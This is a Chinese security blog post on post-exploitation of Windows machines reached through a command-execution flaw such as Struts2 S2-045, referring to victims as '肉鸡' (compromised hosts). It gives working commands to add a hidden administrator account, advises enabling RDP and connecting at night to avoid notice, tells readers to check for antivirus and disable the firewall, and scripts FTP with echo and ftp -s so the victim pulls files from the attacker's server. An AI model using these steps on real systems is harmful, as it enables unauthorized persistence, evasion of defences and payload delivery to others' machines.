安全街
一步步,我们的信息安全时代

自15年起,各种反序列化漏洞层出不穷,s2-045更是来到了顶峰。这种命令执行可以让我们直接得到一个非交互Shell。
拿到命令执行权限后,第一反应肯定是提权,根据经验来看,这种执行权限大多为Administratorroot,真正做了权限控制的还是占少数的。Linux下我们可以第一时间采取反弹Shell的形式,然而Windows下的nc并不能保证对每台机器都起作用,于是文件上传和下载就出现了限制。
对于此种情况在此分享两种思路。

3389连接

相较于Linux,Windows最大的优点就是可以使用3389进行桌面化远程操控,方便省事,很多cmd不能做的事情(尤其是cmd还远远没有bash那么强大)都可以做了。

为肉鸡添加自己的账户。

根据经验,密码最好由数字字母特殊字符3种组成并在11-13位之间,不然很有可能出现提示密码不符合规范的情况。例:
执行net user bugroad bugroad@12345 /add,添加账户。
执行net localgroup administrators bugroad /add,将自己的账户添加到管理员组。

若目标机器未开启3389,可以去网上搜寻各种由cmd开启3389端口的命令。
缺点:若是无人职守的机器,我们可以随意玩耍,不过也要祈祷我们在连接3389的时候没有其他人连接,因为3389只允许1人同时连接。如此说来被发现的风险还是比较高的,当然我们也可以半夜摸黑起来玩耍。

使用FTP上传下载

Windows下没有一条即可下载的命令,但是我们可以使用FTP的-s参数使用txt代替人为交互,达到一条命令即可连接到FTP服务器执行上传下载的效果。

ftp -s:filename 指定包含 FTP 命令的文本文件;命令在 FTP 启动后自动运行。

我们可以先使用echo将提前准备好的命令参数写到txt中,在使用此txt代替我们交互即可。

  • 准备工作

    使用tasklist /svc查看系统进程,检查是否存在杀毒软件,并使用cmd命令关闭windows自带防火墙。

  • 创建交互txt

    这里需要echo命令做输出重定向,其中>表示覆盖写入,>>表示追加写入

    注:有时候单纯的命令执行会导致有些命令出错,这种情况下最好调用cmd,使用cmd.exe /c 要执行的命令的方式来执行命令

    依次执行下列命令

    echo open 你的ftp服务器地址>ftp.txt
    echo 用户名>>ftp.txt 
    echo 密码>>ftp.txt 
    echo get 要下载的文件名(为了方便起见就直接把它放在根目录好了)>>ftp.txt
    echo bye>>ftp.txt
    

     

  • 使用ftp下载文件

    在上一步中,我们创建好了附带命令的ftp.txt,现在我们执行:
    ftp -i -s:ftp.txt
    我们预先放置在ftp服务器上的文件就会被下载到肉鸡上。上传也是一个道理,在这里就不多做赘述。

使用BAT

使用bat脚本我们可以做很多非交互shell做不到的东西。在本地编写好BAT脚本,使用上面ftp下载的方法传到肉鸡上执行。当然不过你不嫌累的话也可以直接用echo写,不过会非常辛苦就是了。

结语

渗透测试是一门艺术,有很多脑洞大开的思路等着我们去实践。随着系统的升级和更新换代,不再更新的渗透工具终有老旧之说,但思路和方法不论新旧都值得我们去尝试和探索,尤其是那些漏洞之外贴近本质的东西。XSS刚出来的时候也被认为是鸡肋的东西,但那只是因为没有人能想得到我们可以使用它来打cookie。

*本文为原创,作者T1dDl3R,首发于本博客。转载请注明

这篇文章还没有人发言,快抢第一!

发表评论